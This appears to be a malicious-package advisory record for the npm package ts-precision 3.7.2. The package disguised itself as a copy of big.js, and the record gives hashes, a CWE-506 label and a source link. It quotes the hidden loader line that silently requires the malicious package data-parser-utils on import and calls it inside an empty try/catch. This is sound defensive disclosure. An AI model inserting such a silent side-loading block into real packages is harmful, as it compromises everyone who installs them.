-= Per source details. Do not edit below this line.=-
Package ships a verbatim copy of big.js v7.0.1 (including the original author metadata 'Michael Mclaughlin M8ch88l@gmail.com' and repo reference MikeMcl/big.js) under a different name, mimicking a legitimate arbitrary-precision math library to lure installers. Hidden between math methods in the module body is an unrelated block: try { const doc = require("data-parser-utils"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }. This block fires on every require('ts-precision') / import of the package, pulling in and invoking the known-malicious npm package data-parser-utils, with errors silently swallowed in an empty try/catch and no-op promise handlers to hide failures from the consumer. The dependency invocation is unrelated to decimal arithmetic and exists solely to side-load attacker-controlled code into any consumer's process at module load.
{
"malicious-packages-origins": [
{
"versions": [
"3.7.2"
],
"sha256": "e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c",
"import_time": "2026-06-25T18:17:38.177326218Z",
"modified_time": "2026-06-25T18:11:56Z",
"id": "IN-MAL-2026-007525",
"source": "amazon-inspector"
}
]
}[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
{
"package_integrity": [
{
"filename": "ts-precision-3.7.2.tgz",
"hashes": {
"sha1": "9ff147230bba976bc169b247c4d0d84ea8254261",
"sha512_sri": "sha512-qeaZg4tesKgUjURYBWfdXHktdEgFeA70MWmdfo9Nixy9wnR+EknggmG17LFuXvpAgrpkjS0n7RAYNNozbjm/Ow=="
}
}
],
"evidence_files": [
{
"tlsh": "03c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc",
"sha256": "4e4f951802cfc3b04a4e1d44353a360afce53a687163be32fa5360b43ea86674",
"path": "big.js"
},
{
"tlsh": "1d210463c9a19da70af85b94bcac03aaf1151b1f40a08c5bb07b130c5f3355b2095b7d",
"sha256": "7b5b152905601ce985c7d4e8c912fd0e79655222935c785079b5aa1d8a5c4620",
"path": "package.json"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-precision/MAL-2026-6469.json"